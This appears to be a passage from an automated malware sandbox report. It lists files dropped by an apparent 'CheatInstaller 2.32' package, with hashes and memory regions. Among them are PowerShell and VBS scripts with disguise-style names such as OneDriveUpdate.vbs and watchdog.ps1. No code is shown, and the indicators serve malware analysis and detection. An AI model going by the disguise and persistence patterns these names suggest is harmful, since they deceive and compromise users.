SHA512 b38ebcf2af28488dbf1d3aa6a40f41a8af4893ad6cb8629125e41b2d52c6d501283d882f750fc8323517c4eb3953d89fa0f3c8ceba2ae66a8bf95ae676474f09

C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\node_modules\minipass-json-stream\node_modules\minipass\package.json

MD5 1943a368b7d61cc3792a307ec725c808
SHA1 fc79b496665e2cdfc4bdaac9c7d7c4b2f4645f2c
SHA256 e99f6b67ba6e5cda438efb7a23dd399ee5c2070af69ce77720d95de5fb42921e
SHA512 7c05f03f5d3db01798c56c50d21628fc677097630aacf92e9ea47e70ff872d0e4e40217c1c2d5e81fc833ccf5afe9697f8f20a4772459b396aa5c85263289223

C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\node_modules\node-gyp\node_modules\are-we-there-yet\LICENSE.md

MD5 1750b360daee1aa920366e344c1b0c57
SHA1 fe739dc1a14a033680b3a404df26e98cca0b3ccf
SHA256 7f75bb21103e77b7acfcf88a6ad0286741a18b5d13c4326160346e8cf7e356ad
SHA512 ff2486d589d32fb35aad9c02cd917ba1e738ca16b7ccc7954cdc4712a968fc5fc25612b489f962cbe8ddb2be40057cd1b59402aa9cade9b6479a1d0e1d7743a4

C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\node_modules\node-gyp\node_modules\cacache\node_modules\brace-expansion\LICENSE

MD5 a5df515ef062cc3affd8c0ae59c059ec
SHA1 433c2b9c71bad0957f4831068c2f5d973cef98a9
SHA256 68f12f6e2c33688699249c01d8f9623c534da20aa71989c57b061b7bc1676d14
SHA512 0b0068b8beb6864dbb6971d9fe165d2d5fd420bcd6d7bbbd8f42589eb981bf95d854df2d16c21d378ea6d48f562345d2f66de0fd17134dffa8495eb496e6dff0

C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\node_modules\node-gyp\node_modules\minipass\LICENSE

MD5 5f114ac709a085d123e16c1e6363793f
SHA1 185c2ab72f55bf0a69f28b19ac3849c0ca0d9705
SHA256 833faa18ac4b83a6372c05b3643d0d44ecd27d6627b8cd19b0f48fe74260cf39
SHA512 cab00a78e63dec76fa124fc49d1c28962d674fa18dda5fdf2819078bd932f1bf0cc9abd741b78f62869b4809473099f85ba8a622bc96f4ee92cf11b564346597

C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\node_modules\npm-audit-report\LICENSE

MD5 5324d196a847002a5d476185a59cf238
SHA1 dfe418dc288edb0a4bb66af2ad88bd838c55e136
SHA256 720836c9bdad386485a492ab41fe08007ecf85ca278ddd8f9333494dcac4949d
SHA512 1b4187c58bebb6378f8a04300da6f4d1f12f6fbe9a1ab7ceda8a4752e263f282daebcac1379fa0675dd78ec86fffb127dba6469f303570b9f21860454df2203f

C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\node_modules\read-package-json-fast\LICENSE

MD5 ff53df3ad94e5c618e230ab49ce310fa
SHA1 a0296af210b0f3dc0016cb0ceee446ea4b2de70b
SHA256 ec361617c0473d39347b020eaa6dceedaebab43879fa1cd8b8f0f97a8e80a475
SHA512 876b0bd6a10f852661818d5048543bb37389887bf721016b6b7d1fa6d59d230d06f8ff68a59a59f03c25fbc80a2cbb210e7ca8179f111ecd10929b25b3d5cdfe

C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\node_modules\text-table\LICENSE

MD5 aea1cde69645f4b99be4ff7ca9abcce1
SHA1 b2e68ce937c1f851926f7e10280cc93221d4f53c
SHA256 435a6722c786b0a56fbe7387028f1d9d3f3a2d0fb615bb8fee118727c3f59b7b
SHA512 518113037ee03540caae63058a98525f9a4a67425bd8c3596f697bed5ae1d2053fe76f76b85a4eefb80cc519f7b03d368cf4b445288c4ca7cacb5e7523f33962

C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\node_modules\tuf-js\LICENSE

MD5 391090fcdb3d37fb9f9d1c1d0dc55912
SHA1 138f23e4cc3bb584d7633218bcc2a773a6bbea59
SHA256 564bcb001d6e131452a8e9fba0f0ccc59e8b881f84ce3e46e319a5a33e191e10
SHA512 070121c80cd92001196fb15efb152188c47fdc589b8f33b9da5881aa9470546b82cb8a8ea96fe1073723f47149e184f1a96c2777a9fc9b45af618c08464d6c5e

C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\node_modules\wide-align\LICENSE

MD5 9d215c9223fbef14a4642cc450e7ed4b
SHA1 279f47bedbc7bb9520c5f26216b2323e8f0e728e
SHA256 0cef05dfff8b6aa7f35596984f5709f0d17c2582924a751efa471a76de7cdc11
SHA512 5e4ba806f279089d705e909e3c000674c4186d618d6ab381619099f8895af02979f3fc9abb43f78b9ffed33b90a7861f6c4b9d6c1bb47ed14a79e7f90eca833c

C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe

MD5 aeda1b7ad48ba43a03a60fedbc4efa5d
SHA1 a7a4e4db1a5b21570cf2488ebf7ea05741dc324e
SHA256 2c042327ee4bb3857f65c452e1b0d0d2ef76af14b5e68c95e853d42000222a8c
SHA512 f073353c09b5b68d0cf6ad8f20b7a841bb20fe02ebfcd81bf2b98276519193749989185e6df21baf8536a50b40b6c5392d2084474bc6bf225a8ef03770f249be

C:\Users\Admin\AppData\Local\Temp\7zS5C0A.tmp\Install_YTTCHTs.exe

MD5 93c95c4a951ef60981636c4cf35a59e5
SHA1 9d1dea9896da1092b2125e660ad8759278ccd4af
SHA256 fe6b7f75a5d1a8f6fb0609f8eba0dcbd0fc687f562e31fceaa8ae57b5bf43062
SHA512 a02ec8cb136d4ecc4398dd1c34e9bbc0a4a609d6c458a0cba1e7e744ad91272ced3595fa013d35b7520c6c39e8f3bbe1faa687454d35045918be78ab537f2098

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\YTtSTCHEAT.msi

MD5 88d6ef66043282511d78477c3457cd05
SHA1 dedf2529b0f78f9d7dfe5519d080fe1d11fb0344
SHA256 82efcbda4a568f2e898f2c97d3876af8c4c42f2638a339b937b01202bb83fb4a
SHA512 506e03b18e11c6133eb4b997bfd017ab5e5ed7a253e0470ee391d8bf5f86196742b57ec03316f1d5699f7a2f556df38468c539a6ff70c52e092bf0c1de61fa2b

C:\Users\Admin\AppData\Local\Temp\MSI7020.tmp

MD5 c9c085c00bc24802f066e5412defcf50
SHA1 557f02469f3f236097d015327d7ca77260e2aecc
SHA256 a412b642de0e94db761ebd2834dde72eed86e65fc4a580670a300015b874ba24
SHA512 a6fa1f34cd630a7509a6441be7ad060de7e039967d2ec015e27c2a643b04e0eecf53902b7173c4c2e92e3a890bd7acb6a3307d9923838f0bfc71496fb184b1de

C:\Users\Admin\AppData\Local\Temp\MSI70DD.tmp

MD5 6bb65410717bb2c62ed92cdbc9c41652
SHA1 1f0d56a24588c0c07e878f348df6bb0c3e4f693a
SHA256 91a6c5daebe89b7d9157188a2b3fa8e47d53b4d20c29bcc244635d1943397f7b
SHA512 1a864c6d010e3d62337a2067f53e82067ab01a556edee65036658bb7dd863bf22379d16aaf6385fda23060148c68c7225610058a153420e7b125c038285ceb38

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\YTtSTCHEAT.msi

MD5 52df3708f56c6c6370196d416c076cc9
SHA1 a0f3bc4359db149c9599e2213a1d6ee72908598b
SHA256 4f80c85e5152e38215518eb5e7b7148cf4b30f048da45dddaf94bed4406ac7f6
SHA512 b058e00895b18e04baf7d562df800b3d65ebd1a70d4762fdb7c8389940c14403702491ee9d7f66c036e76937e9c500645a599290384b9adc0d4a7fa816651bb7

C:\Windows\Installer\MSI743B.tmp

MD5 a8338e7b3ce49ab7e793952765ac998f
SHA1 29a2dd67eba553530f84f9e02266474ea678abdd
SHA256 6fa584e22fc546b95fa757279ce5569e5540bf2ac28b138adba41877fe0c645d
SHA512 85c5095099f7a689e5dd125ad8805b90f59a0e4a930ea791383a596e722d56fa62e4f85c28365c01a6ef2c3b4ddd0e53eb6a70777ad94070b49602993497a64f

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_z4t4l0mf.c0n.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4920-3581-0x000002013CD20000-0x000002013CD42000-memory.dmp

memory/4920-3591-0x00007FFA89620000-0x00007FFA8A0E1000-memory.dmp

memory/4920-3592-0x000002013CD70000-0x000002013CD80000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\pss74D5.ps1

MD5 a8a3a992fce81410c5771c10f743f6ba
SHA1 d0dd0c52514afa2150b250e549dfebf87758f191
SHA256 bd580ea3519d7b9c2bc34d30b66af13f580ee5beb1ce828499f607300dbd9bee
SHA512 3edf26ba7095e2532cd0257f50a65c9f71eb85b768f27237f0bf538409cea74e12bbcec01bc0120f9d53bfb6a94b4bac21a17595e259ee23d1a36fbf4615c830

C:\Users\Admin\AppData\Local\Temp\scr74D4.txt

MD5 64d1817b6bfcd6cfda309f8910f51b57
SHA1 9faf2d4a707b789de6970b53b0dc80ac47ec3c52
SHA256 067838889a9eeb91ecb3fc155f3bfed21bd86d8c789d6485cca2a6d6a6bd4391
SHA512 d51ec763f8f2920782d958c84a5fb96d7e80382d88bc9a41ec0ca6e2570ebb328389ead37e4042c83d025a1e3580444f6374ffa015374d6c20c75f9ec85ba7ee

C:\Users\Admin\AppData\Local\Temp\scr74D3.ps1

MD5 b4aaf8eaa1aa2477670ed54128e2c742
SHA1 b756fb677993bcf92916be8979052ed14a6170da
SHA256 5a4a897b8e922880f81b7ad94877acf3b394fffc1811d8826035b33d383624ba
SHA512 078503e1424578aa7a6791d1c962b801c1066958851d04ec4b8e24fc4ac5eecb4c013dc8484d04b5a5177a8bded08ba743f98ac69c656f7b79039fc8d1d7c55f

C:\Users\Admin\AppData\Local\Temp\progressbad.bat

MD5 be24edfb1d4a286352f9da402cd455be
SHA1 e8493ecb4147cd42dad511445485934f106aa956
SHA256 485abff88bcbfa4492e906e096012a13d7a7d5b0efb54a489805ca1482219d9d
SHA512 0a33299909ef32aea0b08ddcca7615ec21c025abbf2694c7764359e3b96183cfc76a684f32d246009e51e6d3b3d5a85343eee5b85e9ec28ffb869d1ac8033796

C:\Users\Admin\AppData\Local\Temp\progressgood.bat

MD5 845cf6630a4a8d184f93d0f732feb846
SHA1 1d9219177aaf25e5a95bdc72ec8cd6fd42e6cace
SHA256 19f3274b5b004259d609e624e54259d1637074a97ab7e6452ddd2bd81ee29153
SHA512 bb6e45187eb464ba6eec05c368ea13c43667307804b10215b5753209fb8d1cdacf0b1fb3460849069211ac76b8706c772f85704b7b7361626798cce373bdac1e

memory/4920-3664-0x00007FFA89620000-0x00007FFA8A0E1000-memory.dmp

C:\Windows\Installer\MSI7864.tmp

MD5 2557173f4299722afce46cc3c0616406
SHA1 b0343c9a9552be977834e415783b486c4714fe97
SHA256 e25369e33c7ef36151769a86d833189b275f85045f35873e9e931547e0a6d591
SHA512 24a46359cb8e22534cbd875fe092d096e3280ca4c24936159894ba95832233ee318494a3eabbdf73ae6010e39a1b5897b4488b2771b416b472bb7f60ceddf40e

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\real_sc09.wav

MD5 5392a5fb1c3d0ce48ee2f6db8c8c157c
SHA1 694ad4d5939fa7d468399150a026a3efce6773bf
SHA256 1033b1227e5a7814b34221274272b384f0f8ddbe31a600ff070ef1f0c1fee901
SHA512 1a0ce0c2c5d4818eb83f38c4c3328eb4aab653a625e0e1fca5338e23f955d4da206c3b0bb3106a89736e69077f75079a3bc54fdc458cebe7389cc8a727e31988

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_wavegan_pp.wav

MD5 1f17c039e805f0366322565c65c44a96
SHA1 58f9a9787e412e22bdfdf80ee989cd0ca76b7ec6
SHA256 618f46233cb90b39d0da37f37033c0f181ece8583f814ce41c11d1a4d5c49666
SHA512 2980f1616f9cc569cc5ecbaa6c71016488867bf0d2c53b51dedd828f5da12921c3582de61f127ca566f5d35c9398af6aa4bc3600845ef569fc8ec5388bdf7dca

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\specgan_timit.wav

MD5 fdc8f9825bac64dbdceff1b1ecfbcf53
SHA1 d831b8fc76023af06b13a05811c18611b7c394f3
SHA256 9d0e13ff2e27a1e3dd01847e67cf787050764c8b1369d90a60a3a03aa498d00a
SHA512 e2216ab419edb6378ca85f1593330a2d68aa6867e4145a93a6a9c4fc0fc80a11f89f6f270ae95549982f0f5f4142512c6b3db7f6fd626971fa26295bccc88b46

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\db.frm

MD5 ac330f2a89a6c828059d1f125cb9cb60
SHA1 a40b10eae1fba1ea43ff70b3941a165d6d0502f2
SHA256 9b2123a554181148e29bbeb66f18da5619b1fd796e4f3de49415748822fef4ec
SHA512 0fd4ac721c969496423c336128c8b3751f3752176c891d85e13cbfc226fcfa00751aab1d1d400ee6b70031b6abaa86fb975f45f30b6c0e8789df27904dedcc42

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\LocalAppDataFolder\watchdog.ps1

MD5 beceb9c4ac840a5ac0b51d8774e63149
SHA1 ea375fee5ff404065ba724e877c9a9b01509353b
SHA256 d2011dcd715dad784b01709bd0af62c07a91aad758f6e461005178a74c2d3b34
SHA512 48e705691523f9804e152433c15142757def6e8dfa72f5dd08169576f7a5073d5e43cce1e148f7df19a566fb863cd377adfcdbeab5308b4cafe9afec9715365d

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\event.csv

MD5 2620f56f03159589486b831d9b6adc4a
SHA1 55dfc135be75692bd64c50b429dcd5460e0b0b90
SHA256 8438f31c41c8214d92ef0227b0e45eae937e6e5221e410af1ad3735dc9e2ee71
SHA512 2915b402391b79635679f415c085646fa3fa6a888b4d00ee9be8aac101760815df6dd390b76192c5d695a116dfd2d297a1e3323b678b184e320049061b974f01

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\LocalAppDataFolder\OneDriveUpdate.vbs

MD5 214ee30dbd649af9294f254fc8c33d07
SHA1 e81a7486c5c19868abb7d39fc757f686c4124662
SHA256 d9747024f7951c01c90b39e18ebe0a490a956625422f165d53f917ae062c4e52
SHA512 f1309c116fcaa64b372946686c3a22b0574db717aef91c095fbb70cbeb4125077f363ad9ce0d4a9ec12bc9f61d61df8ef35f5ac20a6a8b9f68b95203b5f93d19

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\lang_fre.txt

MD5 5b1a12edc7b4e82163e5b39694e5b630
SHA1 088d6df18ce940cf01789a27adeaa150f9dc26b7
SHA256 206bac7b50b6bd8467ccffcb6d0833c4c8c58a2e82d205f608d4127ddc3402c9
SHA512 07846ad52962fc7f07b9e950343f906db5ac09287ced6d4659dae5f99f3fc8ee02916d66557dc2a0a7edbca0a716d8b26c252642558417986532cc28428494cc

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\gl_sc09.wav

MD5 f759d9f3f35dda05908011fcaed1d018
SHA1 0a7852907851700f7424094b7658d78743559dae
SHA256 1780f4481aae5bc51fb79a42d92946ade0c5459efd99daa67bf2d1dcae275919
SHA512 6cb7ab0ac9cb17d194b2a635dab9e5934d36623be7c126785cd83e1d98fe55a262068bc2676fd1499a07a1160005aff7d6199e9be544fad4581debcddf1b0390

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\lang_ita.txt

MD5 89e2a161df2ef245781707ff93e978bc
SHA1 ab2189d5c8dca09cade0586b929f0264c327db32
SHA256 b8f747babf732bb64a9cfc60a09b79001c87eb3b37d9704174c0964a49ed6f4a
SHA512 0e78e380198330cb143b17490d4540473d359a0198888dfd59ff5b1a94a8637f0e6e8998d2ea6ef83794d41771db449bb4abdc2692872a21ebd7d585652b4115

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\wavegan_piano.wav

MD5 84cb9d76404e7060326ed19dc51a9a1f
SHA1 5945326bbc8b4e48afbea13f8c2cf564ffbafbee
SHA256 c6ca1f7b252c74ae234c25f37b8eb0122945be66701bf22486c3c27de8d9908b
SHA512 95f3fdab34ef9a3c4b797a50c2b00d068da4d309e6aad2b288c140d71a5ef45f182d36a97b99768f50fc226217b7b7ab6d4a4ba3ede529efa801cdbfea575d28

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\real_tatum.wav

MD5 f764169bffe65099eda80ace5f90e046
SHA1 82bcaec9920ffabc3c6ea08a277511c2e871b230
SHA256 88341a5ee3600529b8026d421d2b6004299d9bc3d89bdb3e2a8643cca107f3ed
SHA512 3eedf74feb8a30e2ddb6767b25580625e7d200e34e8a20a7412bc4e60d8ca5194c7d2436a632cedc676d93841a560bd0de9470d48f6eee4a4ad3b7d5f4064d80

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_samplernn.wav

MD5 5acab132e4baf883d7f785fabf624952
SHA1 dcd1e3fe209cea31e72531e1484b6bb156347308
SHA256 e14563629a67f07764f12cfae343d8ddb0309cbda241391d095fbb6109302dd1
SHA512 714ed7d425424006fbf248c2e5b95e6525f4abc6e563ecf544fe52f12881af7cf8bd73e790657766e545e753c23f1bd363dde8b6faba675bca147a22cc802c3c

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\db.MYI

MD5 f0bb4307afbd586f0499f4023213863d
SHA1 cd978f445f02aab75b1d89c5e28e348860d8c306
SHA256 49a2cd5ce74b5969db3eb785c02fda21f207672b2348c95252b3200d05281129
SHA512 a4327e9535d84ad98b4880764a05141170febf1c02d3fb74f71d704185e8176545c15ecfa34e5c8218cc33f4b7f07deb1fe0f2c06c1b400a3798a75016de861c

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\slow_log.frm

MD5 5cf177c70e9be2f41adc86ea7e0fc48b
SHA1 9a597f4d25a0fb4837fa06b9b3792de65fae9551
SHA256 9276bfd579b31e71a0f85e8b1085e6f00aafc1428b3c5dee2e765e80c34260a3
SHA512 054f52c54dd936a87ad49f1b31fbf248962ad6909686a98e3b76c6772f7ffbb09e6ecb336c3ff6499eadd45746e407c90992fe5e93f44d0e7feee4cab1e071a1

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\help_relation.MYI

MD5 b7d1f26327bf857bf6ce98ea4fda22b1
SHA1 b3f9c0dd62d5a7f533be36664f8e4954cd1f216d
SHA256 7ce3f6771b4c0a0c0e662dc51ecb460aae223bb3292eaea6c1c6f1bb805b3786
SHA512 91e83b2a3aa885e240f2634d15662954aa0d1104b85ae7bf33948b6bcffcbf763baddb3ecdabd15de53d6eda23d765716891b4dbaaf70168b837480f055e5ab2

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\specgan_birds.wav

MD5 189ae0c626d6d7287e0ffed4389ccb05
SHA1 ec64c9f7b9fa6d6879793317e8431ac69338ddb8
SHA256 f43a43e58ecd71a43a1393a6c6a3056228e525963704ed75ae04bd5fbcd2305f
SHA512 973e344a2d266a1eb1bd848945c3cfcc16e5c4f0aa9e71f6fdfd96b9e7a18cbca630239257bf69b0922dae275e364068609be6d42f6a6209e853b2ff0600790c

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\gl_birds.wav

MD5 639eb4627992165dad32ad41df746bf7
SHA1 286d70c527d4a0d03c5feb0348f6d6e507afaaed
SHA256 fb5a9508c75910052b7761a50028084912581eec358f6378d5865a531b71ca64
SHA512 886c1453dac99f4ebf8e3918641da602a0bd062a0111e4187be6a9ea4b11182db2d093ce8f28a21347645b74b67aa6c9d0fb1970a521e4ad8c6f0626864e8640

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\help_topic.frm

MD5 ccaca741f4002cb8af48d485501ec8e9
SHA1 4895716a9baf869a5ba2ec1c2d0523b7bc8a6cb3
SHA256 0e2099aa021c0a2819f8f80960d729e66f69754675bfe847af8923029a330ec1
SHA512 09f005f1e7e8f9f388031c673a593c8afac42298b6f97ff708babfbc403a952692a0bbfbab3ebbd89f8506c2ec7bdb4154f70827680b6dfd390f80054ff2910a

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\general_log.frm

MD5 ea26bb989e3e2c321a47d499d2682ae1
SHA1 a79e8c99186c20fb09f1457b3d183538e1e1b1bb
SHA256 4a208c39ac55c440fa336c3463428609db81112512f6551a1331a516a2d1da81
SHA512 07f2b43db67b76b463c1770dd6ddb445bbcefcd8f8dfb85e9c28306cf5282272805516dd3166851b66a8358e16632a09a524d6918aae8711d97939beda53137e

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\gl_drums.wav

MD5 123437d6f80fe45f397a067ce4872d89
SHA1 3b981369c54593b4dcfd3f7e08db8f3e67a3fba9
SHA256 25289632dccc370b326d589d06169c7383c0a39b6d220dd468a01c785d54abf9
SHA512 25b245f916b58cd359ee017cf48171cc3624c87e7941565db5ae9d06fb3cb6a68423f4c39cc38c8a66bbe280e2a048a04d84d83700d35ed5c537d4d6525eb623

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\gl_piano.wav

MD5 82e152e8a610da8132789c9d4a4d1d3f
SHA1 055180b27a639248c3be0b2d875630ae256d9890
SHA256 82040461eebb7aaf3c6055884abcc642300ff37d241a1b7ee794e0b0b45b88d7
SHA512 77e525487b3d7be2d473fc296445bfb2c06ec9ddd0cb5c0b174e40101f98326d48fd2da797e327b1fb333e5ea56fd5d1ef14582e92a5591e60da3260619c67bf

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\gl_timit.wav

MD5 b1938437bfc4c13e424990f4d3f2353a
SHA1 fc63b1e664c5ea8faa8b5df75a2756e59ae7a40a
SHA256 d531ed6375a6ade4d449389b67e0a312fc97f3fbd025a627abd72f2705fdbc26
SHA512 680179878406763eb57112fcd942f58fcf089b6fc6c6a7b19ee0fe2ec69b5eca218539afb8d10c55b6901b273cfae93dec52e8a3a46f5e8aa684079be70547ab

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_parametric.wav

MD5 de35645b9bca5dee784285ee52aa407e
SHA1 3e23801fba4d83ef2c8f2ed772b0aedd8b1395b9
SHA256 a5289b50b6178e8b4c3ea814a0c25cf4b4c2c8e3a0e30e416dbdac49a61d3864
SHA512 78c8ba646941d8806fddaa6a0ba1154daa1463703651d625a230422374b157d63bd2959fa8b561cc1e9e40b5601b65f36aae85d158d85cdf0460e5e7f637a17d

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_wavegan_ps4.wav

MD5 cf7e23b55069463bb897e1d80257b0c2
SHA1 39e1e3be1495678b60a14dac1247b5411fa4b2cc
SHA256 c9b064614012bbe92168a41c47493b35194840a8bcdf5b7238edcf26eb075900
SHA512 418ac4c4c7d87ea18cc3b8e03144ecbe323a8098469b79226261ee26eb87fbe274aa81253e688b06c96a5eb04682749e9b2f761e2547452614e7fcb0f32a38ac

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_specgan.wav

MD5 9d8691fd2b28078cac74060d0fd33bf7
SHA1 21d9fa20835c46cec90641380ea9aa71c57ab85e
SHA256 1bbf3a28bc06757cb8a3b19bc7186c583594b18ac459df231cf9c9aabb1f3bb9
SHA512 626e71144737ba2e057a426a7f6c59f1b92dc52141752f6a8711af969574e441c1582c038b4254c917126ee656f17281bea7a8a093e1e05eff55b4d54dceea50

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_wavenet_r9y9.wav

MD5 4a1d53e7fd0f268a7fd23fb9b3139ee3
SHA1 a80942c3cab97ea97b2406fab965bb4b3c16c2fe
SHA256 7832608e235911200d1c224c201d3aefefe3b154911a53c2507cd83e31447c1f
SHA512 cc00e720b65246bd0ad30dec09a35a5bc0f409645f47d8576649036408a258b7a372c0e4f5f16b222a9965a92cd2dd03fd6f782bec5f1a85438a339c310dfd01

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\quant_wavegan_ps2.wav

MD5 0f9223e9fdb356d794ebef388a0bf432
SHA1 4ceede02e49e2fae1a3851b3ff58de226b2ca970
SHA256 e99d3f16c079d80c3f8ee5f897828a0d2934a6c7c0170d17ad6db3a0ce9c52d1
SHA512 4b89e85b19f760f025e06e338107834fa5e02fd58197166228cf664c09ba1335dbf2056a55a3015dce933db7e4e04893592f99768be79e4d79328007e9e183b6

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\real_birds.wav

MD5 0390e78a8086536f56e11b0b40be2d62
SHA1 ba61e82cce9e0ef301db174f83e94b9244faa799
SHA256 9102b9e757cea1fddffd0f82888ff829af7f11f6c522a31939fd54daf0b3aa22
SHA512 6182190e88ccbbb060a6779b97e27794aa69252f4196b307165006d57234aeee62283c1cfb41d405847c5079d3828706cab648281d40dafaf9cb10984868b1e9

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\real_drums.wav

MD5 149cd5cc6a68e10130db2c4a03d71de0
SHA1 4be908d4048eebb86e3b5c95964c4bc156282dda
SHA256 6a30422fce563f3a084020eb86a3a728c3cf1eb04506e081e0fa7bbca9b54ee1
SHA512 478038839937cbf277534635da1561b9d448ecd3b51ca00f1109417a45969777e2b523ecc065f781599e7cb4a2b80acfeedb7528e8fe8683c4b3d7788a38047e

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\Audio\real_piano.wav

MD5 5b88b489ce5a9207f1b60669d32f7a0e
SHA1 d2ba6f65e8091324b5042baefd58bde2177fa724
SHA256 216fdaac90960ee05ff540fe214cfdc314b4ae57892437c940eb7b0edb9bc87f
SHA512 df3bf926e4c85adc21599348442b4e8093885030d9dd0fda3ea0a50606cfd1cd805ee89cdd7f43c48863671e68309955fac14e50bb157590e6984a2233333b29

C:\Windows\Installer\MSI8646.tmp

MD5 cac17c92ed0d30bc68ce60905e0af1ea
SHA1 29589b5816214f537ffb03a4ff9c79f1bd25908b
SHA256 e5a59959b68626f622c7a27b2a42468dbfe03a6d956b58b2cdccedf0a632d161
SHA512 041aab2032745c2f800ac05ee77073167bf37f81dee56774b498c8f1b60fdcc8f16904e909ed42ef9157dfebeada9998d5c155aa1a10df1ccd608177425acc20

C:\Windows\Installer\MSI8724.tmp

MD5 165f730f078c7019ea5f2642f8208cda
SHA1 370f2e4d1f298b62c1d4743d0e23d2a2d41f950d
SHA256 48f509d74ca1afa44b3053e5fb0ddc15d56ca8844e9d150419891c5a38a071a6
SHA512 36868c499b28f96853fb77a1dacef2ad2a06ee7b1be41ff2782ac0f90dd247f522dc64951fa72bb77a85d930ddffe28b06eb391e5bf803e396adaa7211c183b6

memory/372-3839-0x00000000715E0000-0x0000000071D90000-memory.dmp

memory/372-3838-0x0000000004BD0000-0x0000000004C06000-memory.dmp

memory/372-3841-0x0000000004D00000-0x0000000004D10000-memory.dmp

memory/372-3842-0x0000000004D00000-0x0000000004D10000-memory.dmp

memory/372-3843-0x0000000005340000-0x0000000005968000-memory.dmp

memory/372-3844-0x0000000005200000-0x0000000005222000-memory.dmp

memory/4312-3854-0x00007FFA89620000-0x00007FFA8A0E1000-memory.dmp

memory/4312-3861-0x00000187FC080000-0x00000187FC090000-memory.dmp

memory/372-3855-0x0000000005AE0000-0x0000000005B46000-memory.dmp

memory/4312-3867-0x00000187FC080000-0x00000187FC090000-memory.dmp

memory/372-3866-0x0000000005C50000-0x0000000005CB6000-memory.dmp

memory/372-3868-0x0000000005CF0000-0x0000000006044000-memory.dmp

memory/372-3870-0x00000000061A0000-0x00000000061BE000-memory.dmp

memory/372-3871-0x00000000061C0000-0x000000000620C000-memory.dmp

memory/4312-3872-0x00007FFA89620000-0x00007FFA8A0E1000-memory.dmp

memory/1544-3873-0x00007FFA89620000-0x00007FFA8A0E1000-memory.dmp

memory/1544-3874-0x000002793C700000-0x000002793C710000-memory.dmp

memory/1544-3884-0x000002793C700000-0x000002793C710000-memory.dmp

memory/1544-3886-0x00007FFA89620000-0x00007FFA8A0E1000-memory.dmp

memory/4540-3887-0x00007FFA89620000-0x00007FFA8A0E1000-memory.dmp

memory/4540-3888-0x000001E0702E0000-0x000001E0702F0000-memory.dmp

memory/4540-3889-0x000001E0702E0000-0x000001E0702F0000-memory.dmp

memory/4540-3900-0x000001E0702E0000-0x000001E0702F0000-memory.dmp

memory/372-3899-0x00000000715E0000-0x0000000071D90000-memory.dmp

memory/4540-3902-0x00007FFA89620000-0x00007FFA8A0E1000-memory.dmp

memory/372-3903-0x0000000004D00000-0x0000000004D10000-memory.dmp

memory/372-3905-0x00000000066F0000-0x000000000670A000-memory.dmp

